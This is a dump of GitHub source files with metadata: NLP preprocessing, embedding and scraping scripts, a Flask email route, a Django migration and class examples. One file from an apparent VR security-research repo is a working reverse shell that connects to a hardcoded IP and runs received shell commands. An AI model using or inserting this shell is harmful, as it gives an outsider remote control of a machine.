| blob_id | directory_id | path | content_id | detected_licenses | license_type | repo_name | snapshot_id | revision_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_event_created_at | gha_created_at | gha_language | src_encoding | language | is_vendor | is_generated | length_bytes | extension | content | authors | author_id |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b0501f9a2974e25181fca27f9db4e0b727435d7d
|
3ea56fbaaa5382b752a5a752eb911267f9d93756
|
/src/helpers/preprocessing.py
|
f75b61b02b3b9db7c70f5e0bfdae518216b529ac
|
[] |
no_license
|
dantodor/question-generation
|
888555b40dd0c2b0f081ea25b0cd481206bfa947
|
49d3404d5d984c987b233cecaac7213b814f17bb
|
refs/heads/master
| 2020-03-28T10:08:36.426920
| 2018-09-06T15:31:51
| 2018-09-06T15:31:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,547
|
py
|
import numpy as np
import string
# import tensorflow as tf
from nltk.tokenize import TreebankWordTokenizer, sent_tokenize
use_nltk = True
from helpers.loader import OOV, PAD, EOS, SOS
# def get_2d_spans(text, tokenss):
# spanss = []
# cur_idx = 0
# for tokens in tokenss:
# spans = []
# for token in tokens:
# if text.find(token, cur_idx) < 0:
# print("Tokens: {}".format(tokens))
# print("Token: {}\n Cur_idx: {}\n {}".format(token, cur_idx, repr(text)))
# raise Exception()
# cur_idx = text.find(token, cur_idx)
# spans.append((cur_idx, cur_idx + len(token)))
# cur_idx += len(token)
# spanss.append(spans)
# return spanss
#
#
# def get_word_span(context, wordss, start, stop):
# spanss = get_2d_spans(context, wordss)
# idxs = []
# for sent_idx, spans in enumerate(spanss):
# for word_idx, span in enumerate(spans):
# if not (stop <= span[0] or start >= span[1]):
# idxs.append((sent_idx, word_idx))
#
# assert len(idxs) > 0, "{} {} {} {}".format(context, spanss, start, stop)
# return idxs[0], (idxs[-1][0], idxs[-1][1] + 1)
def lookup_vocab(words, vocab, context=None, ans_tok_pos=None, do_tokenise=True, append_eos=False, context_as_set=False, copy_priority=False, asbytes=True, smart_copy=True, find_all=False ):
ids = []
decoded_context = [w.decode() if asbytes else w for w in tokenise(context)] if context is not None else []
words = [w.decode() if asbytes else w for w in tokenise(words)] if do_tokenise else [w.decode() if asbytes else w for w in words]
if context_as_set:
context_set = sorted(set(decoded_context))
for w in words:
# Use a few heuristics to decide where to copy from
if find_all:
this_ids=[]
if context is not None and not context_as_set and w in decoded_context:
indices = [i+len(vocab) for i, x in enumerate(decoded_context) if x == w]
this_ids.extend(indices)
if context is not None and context_as_set and w in context_set:
this_ids.append(len(vocab) + context_set.index(w))
if w in vocab.keys():
this_ids.append(vocab[w])
            if len(this_ids) == 0:
this_ids.append(vocab[OOV])
ids.append(this_ids)
elif copy_priority and smart_copy:
if context is not None and not context_as_set and w in decoded_context:
if decoded_context.count(w) > 1 and ans_tok_pos is not None:
# Multiple options, either pick the one that flows from previous, or pick the nearest to answer
if len(ids) > 0 and ids[-1]>=len(vocab) and len(decoded_context)>=ids[-1]-len(vocab)+2 and decoded_context[ids[-1]-len(vocab)+1] == w:
copy_ix = ids[-1]-len(vocab)+1
else:
indices = [i for i, x in enumerate(decoded_context) if x == w]
distances = [abs(ix-ans_tok_pos) for ix in indices]
copy_ix=indices[np.argmin(distances)]
else:
copy_ix = decoded_context.index(w)
ids.append(len(vocab) + copy_ix)
elif context is not None and context_as_set and w in context_set:
ids.append(len(vocab) + context_set.index(w))
elif w in vocab.keys():
ids.append(vocab[w])
else:
ids.append(vocab[OOV])
        # Copy using first occurrence
elif copy_priority:
if context is not None and not context_as_set and w in decoded_context:
ids.append(len(vocab) + decoded_context.index(w))
elif context is not None and context_as_set and w in context_set:
ids.append(len(vocab) + context_set.index(w))
# print(len(context_set), len(vocab) + context_set.index(w))
elif w in vocab.keys():
ids.append(vocab[w])
else:
ids.append(vocab[OOV])
# Shortlist priority
else:
if w in vocab.keys():
ids.append(vocab[w])
elif context is not None and not context_as_set and w in decoded_context:
if smart_copy and decoded_context.count(w) > 1 and ans_tok_pos is not None:
# Multiple options, either pick the one that flows from previous, or pick the nearest to answer
if len(ids) > 0 and ids[-1]>=len(vocab) and len(decoded_context)>=ids[-1]-len(vocab)+2 and decoded_context[ids[-1]-len(vocab)+1] == w:
copy_ix = ids[-1]-len(vocab)+1
else:
indices = [i for i, x in enumerate(decoded_context) if x == w]
distances = [abs(ix-ans_tok_pos) for ix in indices]
copy_ix=indices[np.argmin(distances)]
else:
copy_ix = decoded_context.index(w)
ids.append(len(vocab) + copy_ix)
elif context is not None and context_as_set and w in context_set:
ids.append(len(vocab) + context_set.index(w))
# print(len(context_set), len(vocab) + context_set.index(w))
else:
ids.append(vocab[OOV])
if append_eos:
ids.append(vocab[EOS] if not find_all else [vocab[EOS]])
if not find_all:
return np.asarray(ids, dtype=np.int32)
else:
return ids
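# Hypothetical example: with vocab = {OOV: 0, EOS: 1, 'the': 2}, returned ids
# below len(vocab) index shortlist words, while ids >= len(vocab) point at the
# context position (or context-set index) the word should be copied from.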
# def find_start(haystack, key):
# haystack = [w.decode() for w in haystack]
# key = [w.decode() for w in key]
# expanded = [haystack[i:i+len(key)] for i in range(0,len(haystack)-len(key)+1)]
#
# if key in expanded:
# return expanded.index(key)
# else:
# # TODO: handle this error - it shouldn't arise if the dataset is well formed and correctly tokenised
# print(haystack)
# print(key)
# return expanded.index(key)
def tokenise(text, asbytes=True, append_eos=False):
text = text.decode() if asbytes else text
if use_nltk:
sents = [s for s in sent_tokenize(text)]
tokens = [tok.lower() for sent in sents for tok in TreebankWordTokenizer().tokenize(sent)]
else:
for char in string.punctuation+'()-–':
text = text.replace(char, ' '+char+' ')
tokens = text.lower().split(' ')
tokens = [w.encode() if asbytes else w for w in tokens if w.strip() != '']
if append_eos:
tokens.append(EOS.encode() if asbytes else EOS)
# tokens = np.asarray(tokens)
# return np.asarray(tokens)
return tokens
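# Hypothetical example: tokenise(b'Hello, world!') -> [b'hello', b',', b'world', b'!']
# (sentence-split, Treebank-tokenised, lowercased, and re-encoded to bytes).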
def char_pos_to_word(text, tokens, char_pos, asbytes=True):
ix=0
text=text.decode() if asbytes else text
if use_nltk:
sents = [s for s in sent_tokenize(text)]
spans = [[s for s in TreebankWordTokenizer().span_tokenize(sent)] for sent in sents]
# lens = [len(sent)+1 for sent in sents]
offsets = []
for i,sent in enumerate(sents):
offsets.append(text.find(sent, offsets[i-1]+len(sents[i-1]) if i>0 else 0)) # can we do this faster?
spans = [(span[0]+offsets[i], span[1]+offsets[i]) for i,sent in enumerate(spans) for span in sent]
# print(char_pos)
for ix,s in enumerate(spans):
# print(s, tokens[ix])
if s[1] > char_pos:
return ix
        print("couldn't find the char pos via nltk")
print(text, char_pos, len(text))
else:
tokens = [t.decode() for t in tokens]
if char_pos>len(text):
            print("Char pos doesn't fall within the size of the text!")
for t,token in enumerate(tokens):
for char in token:
ix = text.find(char, ix)
ix += 1
if ix >= char_pos:
return t
        print("couldn't find the char pos")
print(text, tokens, char_pos, len(text))
# Filter a complete context down to the sentence containing the start of the answer span
def filter_context(ctxt, char_pos, window_size=0, max_tokens=-1):
sents = [s for s in sent_tokenize(ctxt)]
spans = [[s for s in TreebankWordTokenizer().span_tokenize(sent)] for sent in sents]
# lens = [len(sent)+1 for sent in sents]
offsets = []
for i,sent in enumerate(sents):
# print(ctxt.find(sent, offsets[i-1]+len(sents[i-1]) if i>0 else 0))
# print(len(sents[i-1]) if i>0 else 0)
# print(offsets[i-1] if i>0 else 0)
# print(offsets[i-1]+len(sents[i-1]) if i>0 else 0)
offsets.append(ctxt.find(sent, offsets[i-1]+len(sents[i-1]) if i>0 else 0)) # can we do this faster?
spans = [[(span[0]+offsets[i], span[1]+offsets[i]) for span in sent] for i,sent in enumerate(spans) ]
for ix,sent in enumerate(spans):
# print(sent[0][0], sent[-1][1], char_pos)
if char_pos >= sent[0][0] and char_pos < sent[-1][1]:
start=max(0, ix-window_size)
end = min(len(sents)-1, ix+window_size)
# print(start, end, start, offsets[start])
# new_ix=char_pos-offsets[start]
# print(new_ix)
# print(" ".join(sents[start:end+1])[new_ix:new_ix+10])
flat_spans=[span for sen in spans for span in sen]
if max_tokens > -1 and len([span for sen in spans[start:end+1] for span in sen]) > max_tokens:
for i,span in enumerate(flat_spans):
if char_pos < span[1]:
tok_ix =i
# print(span, char_pos)
break
start_ix = max(spans[start][0][0], flat_spans[max(tok_ix-max_tokens,0)][0])
end_ix = min(spans[end][-1][1], flat_spans[min(tok_ix+max_tokens, len(flat_spans)-1)][1])
# if len(flat_spans[start_tok:end_tok+1]) > 21:
# print(start_tok, end_tok, tok_ix)
# print(flat_spans[tok_ix])
# print(flat_spans[start_tok:end_tok])
# print(ctxt[flat_spans[start_tok][0]:flat_spans[end_tok][1]])
return ctxt[start_ix:end_ix], char_pos-start_ix
else:
return " ".join(sents[start:end+1]), char_pos - offsets[start]
    print("couldn't find the char pos")
print(ctxt, char_pos, len(ctxt))
def filter_squad(data, window_size=0, max_tokens=-1):
filtered=[]
for row in data:
filt_ctxt,new_ix = filter_context(row[0],row[3], window_size, max_tokens)
filtered.append( (filt_ctxt, row[1],row[2],new_ix) )
return filtered
def process_squad_context(vocab, context_as_set=False):
def _process_squad_context(context):
# print(context)
# print(tokenise(context))
context_ids = lookup_vocab(context, vocab, context=context, append_eos=True, context_as_set=context_as_set, copy_priority=False)
context_copy_ids = lookup_vocab(context, vocab, context=context, append_eos=True, context_as_set=True, copy_priority=True)
context_set = set([w.decode() for w in tokenise(context)])
context_len = np.asarray(len(context_ids), dtype=np.int32)
context_vocab_size = np.asarray(len(context_set) if context_as_set else len(context_ids), dtype=np.int32)
res = [tokenise(context,append_eos=True), context_ids, context_copy_ids, context_len, context_vocab_size]
return res
return _process_squad_context
def process_squad_question(vocab, max_copy_size, context_as_set=False, copy_priority=False, smart_copy=True, latent_switch=False):
def _process_squad_question(question, context, ans_loc):
ans_tok_pos=char_pos_to_word(context, tokenise(context), ans_loc)
question_ids = lookup_vocab(question, vocab, context=context, ans_tok_pos=ans_tok_pos, append_eos=True, context_as_set=context_as_set, copy_priority=copy_priority, smart_copy=smart_copy)
question_len = np.asarray(len(question_ids), dtype=np.int32)
if latent_switch:
all_ids = lookup_vocab(question, vocab, context=context, ans_tok_pos=ans_tok_pos, append_eos=True, context_as_set=context_as_set, copy_priority=copy_priority, smart_copy=smart_copy, find_all=True)
# print(all_ids)
question_oh = np.asarray([np.sum(np.eye(len(vocab)+max_copy_size, dtype=np.float32)[ids], axis=0) for ids in all_ids], dtype=np.float32)
# print(np.shape(np.eye(len(vocab)+max_copy_size, dtype=np.float32)[all_ids[0]]))
# print(all_ids)
# print(np.shape(question_oh))
# exit()
else:
question_oh = np.eye(len(vocab)+max_copy_size, dtype=np.float32)[question_ids]
return [tokenise(question,append_eos=True), question_ids, question_oh, question_len]
return _process_squad_question
def process_squad_answer(vocab, context_as_set=False):
def _process_squad_answer(answer, answer_pos, context):
answer_ids = lookup_vocab(answer, vocab, context=context, append_eos=False, context_as_set=context_as_set)
answer_len = np.asarray(len(answer_ids), dtype=np.int32)
max_len = np.amax(answer_len)
answer_token_pos=np.asarray(char_pos_to_word(context, tokenise(context), answer_pos), dtype=np.int32)
answer_locs = np.arange(answer_token_pos, answer_token_pos+max_len, dtype=np.int32)
return [tokenise(answer,append_eos=False), answer_ids, answer_len, answer_locs]
return _process_squad_answer
|
[
"tomhosking@gmail.com"
] |
tomhosking@gmail.com
|
e1a1cca35ab531ef4ab7f16081728f13d3af2a8f
|
71ac26b94862581a50ed859be89724ac01ee3c88
|
/main.py
|
e60973be089a376fd96f6a3b061eedfd3d236246
|
[
"Apache-2.0"
] |
permissive
|
anderct105/va-questionnaire-3d
|
c7318b97b34fb876f3af7f72813806c26d737cce
|
a95650703e650c4c0640ab22d4db325799f15e70
|
refs/heads/main
| 2023-03-20T03:31:27.120751
| 2021-03-18T14:55:24
| 2021-03-18T14:55:24
| 326,024,322
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,443
|
py
|
"""
Author: Ander Cejudo
Github: https://github.com/anderct105/va-questionnaire-3d
"""
from utils.CargarCuestionario import CargarCuestionario
from utils.CargarEmbedding import CargarEmbedding
from utils.Preprocesar import Preprocesar
from utils.RepresentarEmbedding import RepresentarEmbedding
def menu():
    with open('banner.txt', 'r') as f:
        text = f.read()
    print(text)
print("Which questions do you want to load?")
print("\t1. All the questions in the questionnaire")
print("\t2. All the questions present in Adult")
print("\t3. All the questions present in Child")
print("\t4. All the questions present in Neonate")
print("\t0. Finish")
try:
option = int(input("Select one between 0-4: "))
if option < 0 or option > 4:
raise Exception
except:
print("Not a valid value!")
exit(1)
return option
def load_questions(option):
try:
if option == 0:
print("Bye!")
exit(0)
elif option == 1:
questions = CargarCuestionario('./data/FullInstrument4-3-13.xls', hoja='Master', columna='question')()[2:]
elif option == 2:
questions = CargarCuestionario('./data/AdultQuestions.txt')(formato='txt')
elif option == 3:
questions = CargarCuestionario('./data/ChildQuestions.txt')(formato='txt')
else:
questions = CargarCuestionario('./data/NeonateQuestions.txt')(formato='txt')
except IOError as exc:
print(exc)
print("The data could not be found, make sure that you downloaded the data folder from the repo.")
exit(1)
return questions
# Load questions
option = menu()
questions = load_questions(option)
# Preprocess the questions (lower, tokenize...)
questions_pre, _ = Preprocesar(questions)()
# Get doc embedding of each question, the Glove in the repo is 50 dimensional
glove = CargarEmbedding('./glove.txt').loadGloveModel()
questions_pre = RepresentarEmbedding(questions_pre)(glove)
# Save the questions and the embeddings in the corresponding format to load them in projector.tensorflow.org
print("Saving the results in questions_emb.tsv and questions_meta.tsv")
out_questions_emb = open('./out/questions_emb.tsv', 'w', encoding='utf-8')
out_questions_meta = open('./out/questions_meta.tsv', 'w', encoding='utf-8')
for i, emb in enumerate(questions_pre):
out_questions_meta.write(questions[i] + '\n')
out_questions_emb.write('\t'.join([str(x) for x in emb]) + '\n')
out_questions_meta.flush(); out_questions_emb.flush()
out_questions_meta.close(); out_questions_emb.close()
|
[
"anderct105@gmail.com"
] |
anderct105@gmail.com
|
b51c245b608cb68020be7de643b065f7e762282f
|
dde099db439abfca01f26f3508ea0b4d46e32781
|
/market_maker/utils/errors.py
|
f05690f058f7e6cfee91bd2f2ebf1116cd197c27
|
[
"Apache-2.0"
] |
permissive
|
BitMEX/sample-market-maker
|
31f01804493bf2a19809bf58eaa175275d0a5d1a
|
96e81afba02badf65451286a610c584187860a09
|
refs/heads/master
| 2023-05-27T15:08:57.706481
| 2023-05-24T08:02:34
| 2023-05-24T08:02:34
| 22,843,158
| 1,722
| 980
|
Apache-2.0
| 2023-05-24T08:02:36
| 2014-08-11T15:03:37
|
Python
|
UTF-8
|
Python
| false
| false
| 138
|
py
|
class AuthenticationError(Exception):
pass
class MarketClosedError(Exception):
pass
class MarketEmptyError(Exception):
pass
|
[
"samuel.trace.reed@gmail.com"
] |
samuel.trace.reed@gmail.com
|
01c30bb4de79bdd220d19d24afc4f77b0c35af30
|
916e5893558d1ae867d9973f8944bbdd654e99c0
|
/InstagramAPI.py
|
b7c03b1b0466d0e757d822e46fb9edff1beab91f
|
[] |
no_license
|
behnazeslami/Python_InstagramAPI
|
2de2cb32776cd3889aab7669c900e3f4ed304993
|
72bc5e0d8678f3b56d1f47fee7a787c1bfc9db61
|
refs/heads/main
| 2023-08-05T06:28:35.562588
| 2021-09-20T18:37:32
| 2021-09-20T18:37:32
| 408,556,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
# This code is written by Behnaz Eslami - behnazeslami30@gmail.com
import requests
import time
import json
arr = []
end_cursor = '' # empty for the 1st page
tag = 'russia' # your tag
page_count = 5 # desired number of pages
for i in range(0, page_count):
url = "https://www.instagram.com/explore/tags/{0}/?__a=1&max_id={1}".format(tag, end_cursor)
r = requests.get(url)
data = json.loads(r.text)
end_cursor = data['graphql']['hashtag']['edge_hashtag_to_media']['page_info'][
'end_cursor'] # value for the next page
edges = data['graphql']['hashtag']['edge_hashtag_to_media']['edges'] # list with posts
for item in edges:
arr.append(item['node'])
    time.sleep(2)  # insurance against hitting a rate limit
print(end_cursor) # save this to restart parsing with the next page
with open('posts.json', 'w') as outfile:
json.dump(arr, outfile) # save to json
|
[
"noreply@github.com"
] |
behnazeslami.noreply@github.com
|
ff505e8d74891a59f7c13c21d9290044384e1e23
|
50019debbf18849495541bba031e48520d15bc37
|
/webarc/main/views.py
|
e70001094fda4d0b1a16bcfd2993d0655ad95b9b
|
[] |
no_license
|
INFO253-FL2017/assignment-2-leon-lee-jl
|
cbf5500ddc3fce0612371b8f4a6fd9136b1aa669
|
6dd2b5800ab25e1a62bd4cc3406e48342e6a8192
|
refs/heads/master
| 2021-07-11T14:57:57.398622
| 2017-10-16T13:02:16
| 2017-10-16T13:02:16
| 104,949,605
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,051
|
py
|
from flask import render_template, request, jsonify
from flask import Blueprint
import requests
from webarc import app
main_blueprint = Blueprint('main', __name__,)
@main_blueprint.route('/')
@main_blueprint.route('/index')
def index():
return render_template('index.html')
@main_blueprint.route('/about')
def about():
return render_template('about.html')
@main_blueprint.route('/contact')
def contact():
return render_template('contact.html')
@main_blueprint.route('/send-email', methods=['POST'])
def send_email():
post_data = request.json
a = requests.post(
"https://api.mailgun.net/v3/" + app.config['MG_DOMAIN'] + "/messages",
auth=("api", app.config['MG_KEY']),
data={"from": "Blogger User " + post_data['name']
+"<" + post_data['email'] + ">",
"to": [app.config['RECIPIENT']],
"subject": post_data['subject'],
"text": post_data['message']})
response = {
'status': a.status_code
}
return jsonify(**response)
|
[
"leon.lee@berkeley.edu"
] |
leon.lee@berkeley.edu
|
5989ffeadbcb72d4d1597d097fc8e2f8a3c4fa19
|
317b42f142034defeeba00ca6a50efd083f9cf61
|
/app/core/migrations/0004_recipe.py
|
6bdc83323cdd0c4db749d8cf51c8a0b08353e789
|
[
"MIT"
] |
permissive
|
shaunbevan/recipe-app-api
|
dee79e116873c5882e8759d0cc59680b38f3ea94
|
30727efce633b8289523ee1ff336cbfa77d5321d
|
refs/heads/main
| 2023-02-25T15:08:41.955208
| 2021-02-03T04:47:53
| 2021-02-03T04:47:53
| 333,582,412
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,350
|
py
|
# Generated by Django 3.1.5 on 2021-01-31 02:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("core", "0003_ingredient"),
]
operations = [
migrations.CreateModel(
name="Recipe",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("title", models.CharField(max_length=255)),
("time_minutes", models.IntegerField()),
("price", models.DecimalField(decimal_places=2, max_digits=5)),
("link", models.CharField(blank=True, max_length=255)),
("ingredients", models.ManyToManyField(to="core.Ingredient")),
("tags", models.ManyToManyField(to="core.Tag")),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
),
]
|
[
"tbevan@gmail.com"
] |
tbevan@gmail.com
|
162d0c3416325f0b52160d717600c38d7ea8a43f
|
c9563e0dacb5cc19fe5ea42eab858b9c7cbbf1f0
|
/Part2/classes.py
|
892b3d00d0991ca20a90df1edadc686ee4c3b0a0
|
[
"Unlicense"
] |
permissive
|
Torkvamedo/smx
|
0f06fcdfc017ad0764592a44da9f558fe58d079c
|
a5aef4f430f56ac67100c505902f55e18fba5978
|
refs/heads/master
| 2021-01-09T20:30:46.439532
| 2017-06-27T17:18:15
| 2017-06-27T17:18:15
| 81,243,375
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,880
|
py
|
class Heroes():
'''Class to create Heroes of our game'''
def __init__(self, name, level, race):
"""initiate our hero"""
self.name = name
self.level = level
self.race = race
self.health = 100
def show_hero(self):
"""print all parameters of this hero"""
        description = (self.name + ' level is ' + str(self.level) + '. Race is ' + self.race + '. Health: ' + str(self.health)).title()
        print(description)
def lvlup(self):
"""upgrade lvl of hero"""
self.level += 1
def move(self):
"""start moving """
print("Hero " + self.name + "start moving")
# -------------------------------------------------------------------------------
class super_hero(Heroes):
"""Class to create Super Hero"""
def __init__(self,name , level , race, magic_level):
"""initiate our super hero """
        super().__init__(name, level, race)  # initialise the Heroes base class and pass along the values
self.magic_level = magic_level
self.magic = 100
def make_magic(self):
"""use magic"""
self.magic -= 10
    def show_hero(self):
        """print all parameters of this super hero"""
        description = (self.name + ' level is ' + str(self.level) + '. Race is ' + self.race + '. Health: ' + str(self.health) + '. Magic is: ' + str(self.magic)).title()
        print(description)
# --------------MAIN-----------------------
my_hero1 = Heroes("Raynor ", 5 ," Elf ")
my_hero2 = Heroes("Jax ", 4, " Human ")
my_hero1.show_hero()
my_hero2.move()
my_hero1.lvlup()
my_hero1.show_hero()
my_hero = Heroes("Vurdalac ", 10 , " undead ")
my_superher = super_hero (" Alios ", 90, " High Elf", 10 )
my_hero.lvlup()
my_hero.move()
my_hero.show_hero()
print(my_superher.magic)
my_superher.lvlup()
print(my_superher.magic_level)
my_superher.make_magic()
print(my_superher.race)
my_superher.show_hero()
|
[
"campfireinsnow@gmail.com"
] |
campfireinsnow@gmail.com
|
67b6eac4b839bee329e73be49044b9c3f51e22de
|
9bc26e56a4a797857bc5ea68abf93af0887c8dd0
|
/remote.py
|
0adea86778ddd9c9982cea7d1d976875dd95e88f
|
[] |
no_license
|
aymanim/movielocal
|
6a8f38191cb9d8cbb52b5fee740bb5c2f812fadc
|
a6c450cb6ceba08187795f32dc0598842f2895dc
|
refs/heads/master
| 2021-01-10T19:42:22.726799
| 2012-08-19T02:37:04
| 2012-08-19T02:37:04
| 5,467,789
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,731
|
py
|
import ftputil
import moviesearch
import ftp_settings
import pickle
import os
import datetime
import time
import re
import threading
NUM_THREADS = 12
FILE_SIZE_THRESHOLD = 500 * 1024 * 1024
valid_movie_extensions = ["wmv", "avi", "mpeg", "mpg4", "mkv", "mp4"]
common_words = ["the", "a", "of", "and"]
movie_database_url = "http://moviesearchengine.org"
extensions = {}
cache_file = "moviecache"
ftp = None
def ftp_listing_callback(listing):
# parse the listing
# 0 - permissions
# 4 - size
# 8 to end - name
tokenized = listing.split()
name = " ".join(tokenized[8:len(tokenized)])
if(tokenized[0][0] == 'd'):
print "---"
else:
blast = name.split(".")
extension = blast[-1]
extensions[extension] = "1"
movie_name = " ".join(blast[0:-1])
print "FILE ",movie_name
names = movie_search(movie_name)
for val, key in names.iteritems():
flag = 0
print "checking ", val
for words in val.replace(":"," ").replace(","," ").split():
if not words.lower() in movie_name.lower():
flag = 1
break
if flag == 0:
print "found it ", val, key[0], key[1]
print "====="
global_movie_list = []
global_resolved_list = []
def cleanname(name):
remove_year = re.sub(r'[0-9][0-9][0-9][0-9]', ' ', name)
remove_year = re.sub(r'\[[\w]*\]', ' ', remove_year)
split_name = remove_year.lower().replace(":"," ").replace(","," ").replace("-"," ").replace("_", " ").split()
for word in common_words:
try:
split_name.remove(word)
except:
pass
return split_name
def name_resolution(movie_name):
names = moviesearch.movie_search(movie_name)
valid_candidate = None
max_index = 0
max_overlap = 0
cleaned_movie_name = cleanname(movie_name)
# get possible movie names
for val, key in names.iteritems():
flag = 0
cleaned_val = cleanname(val)
overlap = len(set(cleaned_movie_name).intersection(set(cleaned_val)))
#print "checking ", val, " -- ", overlap
if overlap > max_overlap:
#print " seems to work [", overlap, "]"
valid_candidate = [val, key[0]]
max_overlap = overlap
if not valid_candidate is None:
#print "Found it - ", valid_candidate
#print valid_candidate
return valid_candidate
else:
#print "No valid candidate"
#print "non"
return ["",""]
def ftp_traverse(directory):
print "ftp_traverse", directory
for element in ftp.listdir(directory):
        path_to_element = directory + "/" + element
if ftp.path.isfile(path_to_element):
# only add valid videos
if(element.split(".")[-1] in valid_movie_extensions) and ftp.path.getsize(path_to_element) > FILE_SIZE_THRESHOLD:
print "adding to list", element
global_movie_list.append(element)
else:
print "cd ", element
            ftp_traverse(directory + "/" + element)
def create_movie_list():
global ftp
ftp_server = ftp_settings.FTP_SERVER
ftp_username = ftp_settings.FTP_USERNAME
ftp_password = ftp_settings.FTP_PASSWORD
    ftp_movie_directory = "Video/Movies"
print "Connecting to ", ftp_server
# Connect to the server
ftp = ftputil.FTPHost(ftp_server, ftp_username, ftp_password)
#ftp.listdir(ftp_movie_directory)
ftp_traverse(ftp_movie_directory)
file = open(cache_file, "w")
pickle.dump(global_movie_list, file)
def multi_thread_name_resolve(start, end):
for i in range(start, end):
name = " ".join(global_movie_list[i].split(".")[0:-1])
result = name_resolution(name)
global_resolved_list.append([global_movie_list[i], result[0], result[1]])
def progress_bar():
prev = -2
while len(global_movie_list) > len(global_resolved_list):
if prev < len(global_resolved_list):
print "\r", len(global_resolved_list) , " of ", len(global_movie_list)
prev = len(global_resolved_list)
# check to see if the cache file exists.
# if it does and is recent enough
try:
file = open(cache_file, "r")
#days since last modified
a = datetime.timedelta(seconds=time.mktime(time.localtime()) - os.path.getmtime(cache_file))
if a.days < 2:
print "Cache is recent enough"
global_movie_list = pickle.load(file)
else:
print "Recreating cache ..."
create_movie_list()
except IOError:
print "Creating cache ..."
create_movie_list()
block_size = len(global_movie_list) / NUM_THREADS
threadarray = []
for i in range(0, NUM_THREADS):
start = i * block_size
end = start + block_size
print "Setting up thread ", i, "start ", start, "end ", end
t = threading.Thread(target=multi_thread_name_resolve, args=(start, end))
t.start()
threadarray.append(t)
progressthread = threading.Thread(target=progress_bar)
progressthread.setDaemon(True)
progressthread.start()
for t in threadarray:
t.join()
print "Done with the threads "
for stuff in global_resolved_list:
print stuff[0], " | ", stuff[1], " | ", stuff[2]
|
[
"amplenerd@gmail.com"
] |
amplenerd@gmail.com
|
cd4b815067016405eb93fe5c654761083c4f61b4
|
4cc3060aa8992c15e01f00a0452d8ebf99dd920a
|
/Attacks/Vive-Attack-Console/client.py
|
f51fe5ac1503a83fbc6f643d6ebcb8a1350500b9
|
[
"MIT"
] |
permissive
|
BiTLab-BaggiliTruthLab/VR4Sec
|
368318956693d4a0759500a5d710e834695b14ee
|
2547afcd064b6f765f4003b90da2cb618d12bc62
|
refs/heads/master
| 2023-03-16T11:52:24.369773
| 2019-08-14T16:38:24
| 2019-08-14T16:38:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 610
|
py
|
import os, socket, subprocess
s = socket.socket()
host = '172.19.38.76'
port = 9999
s.connect((host, port))
while True:
data = s.recv(1024)
if data[:2].decode("utf-8") == 'cd':
os.chdir(data[3:].decode("utf-8"))
if len(data) > 0:
cmd = subprocess.Popen(data[:].decode("utf-8"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
output_bytes = cmd.stdout.read() + cmd.stderr.read()
output_str = str(output_bytes, "utf-8")
s.send(str.encode(output_str + str(os.getcwd()) + '> '))
print(output_str)
s.close()
|
[
"peter.gromkowski@gmail.com"
] |
peter.gromkowski@gmail.com
|
da40fd8aa1c499ade27540e22d5d1e015b892fc8
|
24d8cf871b092b2d60fc85d5320e1bc761a7cbe2
|
/eXe/rev2735-2828/left-trunk-2828/twisted/test/test_assertions.py
|
55df7afafc27ce116c45e80d60de6ecfab5867d6
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
joliebig/featurehouse_fstmerge_examples
|
af1b963537839d13e834f829cf51f8ad5e6ffe76
|
1a99c1788f0eb9f1e5d8c2ced3892d00cd9449ad
|
refs/heads/master
| 2016-09-05T10:24:50.974902
| 2013-03-28T16:28:47
| 2013-03-28T16:28:47
| 9,080,611
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
from twisted.trial import unittest
from twisted.python import failure
class Assertions(unittest.TestCase):
def testExceptions(self):
exc = self.assertRaises(ZeroDivisionError, lambda: 1/0)
assert isinstance(exc, ZeroDivisionError), "ZeroDivisionError instance not returned"
for func in [lambda: 1/0, lambda: None]:
try:
self.assertRaises(ValueError, func)
except unittest.FailTest:
pass
except:
raise unittest.FailTest("FailTest not raised", failure.Failure().getTraceback())
else:
raise unittest.FailTest("FailTest not raised")
|
[
"joliebig@fim.uni-passau.de"
] |
joliebig@fim.uni-passau.de
|
ecfafbddea6cb8a1005d0e27ba8a10b2fe944d12
|
f5a3f81aeb15b767ae4582842facc05310f92fc7
|
/searching/sequential/sequential.py
|
770821173a6a21c0b74b51ace8eb768026ecfedf
|
[] |
no_license
|
muhallan/algorithms
|
edc021b749d5462cf61724257100333986be20bc
|
c0eef989918f071a04f90bc56e6f6c609bd9c83e
|
refs/heads/master
| 2021-06-26T15:38:27.678403
| 2019-06-21T06:28:46
| 2019-06-21T06:28:46
| 147,846,616
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 388
|
py
|
def sequential_search(list_to_search, item):
found = False
index = 0
while index < len(list_to_search) and not found:
if list_to_search[index] == item:
found = True
else:
index += 1
return found
# testing
even_nums = [2, 4, 6, 8, 10]
# find 5
print(sequential_search(even_nums, 5))
# find 4
print(sequential_search(even_nums, 4))
|
[
"allan.muhwezi@andela.com"
] |
allan.muhwezi@andela.com
|
2c081fceed78b55a7d89a0b92c61ad041dba4e70
|
5c5ea66184e1b62fa05a40168e5f8e6ccb7ac958
|
/app/review/urls.py
|
cdebec198330262eb6b6df4c311c5c25f1cc888c
|
[] |
no_license
|
amitbhalla/feelfreetocode
|
ce757b8c075509be62c1204de7ed1e5b313d8c8a
|
